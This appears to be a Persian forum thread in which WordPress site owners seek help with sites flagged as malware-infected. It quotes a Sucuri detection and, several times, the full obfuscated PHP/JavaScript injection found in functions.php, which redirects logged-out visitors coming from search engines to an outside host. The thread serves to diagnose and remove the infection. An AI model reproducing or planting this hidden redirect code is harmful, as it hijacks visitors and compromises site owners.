• پایان فعالیت بخشهای انجمن: امکان ایجاد موضوع یا نوشته جدید برای عموم کاربران غیرفعال شده است

سایتم ویروسی شده کمکم کنید لطفا

dvdgostar2

Registered User
لایک‌ها
10
دوستان امروز متوجه شدم سایتم ویروسی شده چون وقتی میخوم بازش بکنم سکیورتی فایر فاکس میاد و میگه این سایت الوده هست و سایت باز نمیشه . کمک کنید پیلیز

Last edited:

kooolak

Registered User
لایک‌ها
559
با اجازه صاحب تاپیک

یکی از سایت های منم همین مشکل رو پیدا کرده ! البته چند روز قبل گوگل سایتم رو مخرب شناسایی کرده بود و توی گوگل وبمستر پیام malware ظاهر شده بود کسی میدونه چطور میشه این مشکل رو برطرف کرد ؟؟؟

hnikdel

Registered User
لایک‌ها
146
سایت منم به همچین مشکلی برخورده، لطفاً اگه کسی میدونه، راهنمایی کنه!!!
ایمیل هامون رو که بستن!
مشتی سایت https رو هم که بستن.
گوگل هم بیکار ننشسته سایتمون رو بسته!
چیزی از قلم نیفتاده؟
:lol:

dvdgostar2

Registered User
لایک‌ها
10
من سایت رو در سایت توتال ویروس اسکن کردم و اطلاعات زیر رو بهم داد
Response headers

via: HTTP/1.1 GWA
x-powered-by: W3 Total Cache/0.9.2.4
accept-ranges: bytes
x-google-cache-control: remote-fetch
vary: Accept-Encoding,Cookie
server: Apache
last-modified: Sun, 12 Feb 2012 16:23:17 GMT
date: Sun, 12 Feb 2012 16:39:58 GMT
content-type: text/html; charset=UTF-8

Response content SHA-256
9c1e4a0030f7efc4293de9ad4f6bd4c470c19561c9a5b323d031d1c56f57056e

Last edited:

MihanV

مدیر بازنشسته
لایک‌ها
30,429
wordpress.org/extend/plugins/antivirus

این پلاگین قالب رو اتوماتیک اسکن میکنه

hnikdel

Registered User
لایک‌ها
146
wordpress.org/extend/plugins/antivirus

این پلاگین قالب رو اتوماتیک اسکن میکنه
با این چیزا بعید میدونم درست بشه.
اگه کسی سئو کار باشه فکر کنم بتونه مشکل رو حل کنه.

MihanV

مدیر بازنشسته
لایک‌ها
30,429
با این چیزا بعید میدونم درست بشه.
اگه کسی سئو کار باشه فکر کنم بتونه مشکل رو حل کنه.

شما باید فایل یا کد مخرب رو پیدا کنی و این پلاگین و اونی که توی اون یکی تاپیک گفتم کل وردپرس رو میگرده
نمیدونم چرا همچین فکری میکنید و اینکه نقش سئو کار چیه این وسط ...

dvdgostar2

Registered User
لایک‌ها
10
من خودم روی کدها نسبتا مسلط هستم
یک سری تغیرات دادم
دوستان چک کنید ببینید سایت باز میشه واسه شما

kooolak

Registered User
لایک‌ها
559
نه دوست عزیز

همچنان ممنوع الورود هستیم :دی

اما به این سرعت نظر گوگل عوض نمیشه :D بعد از رفع مشکل چند ساعتی طول میکشه تا ....

سایتم که الان مخرب شناخته شده یه بار دیگه هم این مشکل براش پیش اومده بود و حل شد ، این مرتبه دوم هست ، نمیدونم مشکل اصلی چیه که باز گرفتارش شدم:(

hnikdel

Registered User
لایک‌ها
146
من خودم روی کدها نسبتا مسلط هستم
یک سری تغیرات دادم
دوستان چک کنید ببینید سایت باز میشه واسه شما
پسر خوب، گوگل که هر ثانیه سایتت رو چک نمییکنه که با یه رفرش مشکلش حل بشه.
بعد از اینکه مشکل سایتت رو حل کردی باید از طریق گوگل وبمستر درخواست تجدیدنظر بدی رفیق

M+J

مدیر بازنشسته
لایک‌ها
4,011
ببینید فایل js ناخواسته ای توی قالبتون نیست احیانا؟!!!

dvdgostar2

Registered User
لایک‌ها
10
پسر خوب، گوگل که هر ثانیه سایتت رو چک نمییکنه که با یه رفرش مشکلش حل بشه.
بعد از اینکه مشکل سایتت رو حل کردی باید از طریق گوگل وبمستر درخواست تجدیدنظر بدی رفیق

خودم میدونم گل پسر
من که مشکلم گوگل نیست اول باید مشکل سایتو حل کنم بعد برم سراغ گوگل

kooolak

Registered User
لایک‌ها
559
دوستان از فایل functions ایراد گرفته شده

تو همه خطاها این هست <!--scounter-->

این متن خطا :

Known javascript malware.
Details: Malware entry: MW:JS:DEPACK | Sucuri Security
<!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script><div style="clear:both;"></div>

Javacl

Registered User
لایک‌ها
1,026
دوستان از فایل functions ایراد گرفته شده

تو همه خطاها این هست <!--scounter-->

این متن خطا :

Known javascript malware.
Details: Malware entry: MW:JS:DEPACK | Sucuri Security
<!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script><div style="clear:both;"></div>

یعنی مشکل برای اسمال دو نقطه دی وسط کدها بوده؟! :دی

kooolak

Registered User
لایک‌ها
559
نه باو اونو نمیدونم از کجا پیداش شده :دی

چیزی که پیدا کردم فایل فانکشن:

?><?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>

hnikdel

Registered User
لایک‌ها
146
مثل اینکه مشکل پیدا شده، حالا چطور اصلاحش کنیم؟
حرفه ای ها بیان مشکل رو حل کنن!

M+J

مدیر بازنشسته
لایک‌ها
4,011
مثل اینکه مشکل پیدا شده، حالا چطور اصلاحش کنیم؟
حرفه ای ها بیان مشکل رو حل کنن!

من حرفه ای نیستم! ولی خوب این کد رو از داخل فایل فانکشن پاک کنید حل میشه دیگه!:
?><?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r) {e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr ing(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i \"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|m s|google|substring|split||||||ea|ht|tp|document||| go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>

بعدش از
چک کنید میبینید که درست شده! البته اگه قبلا آدرستون رو بدون www وارد کردید اینبار با www چک کنید. بعدش به گوگل اطلاع رسانی کنید همین.

بالا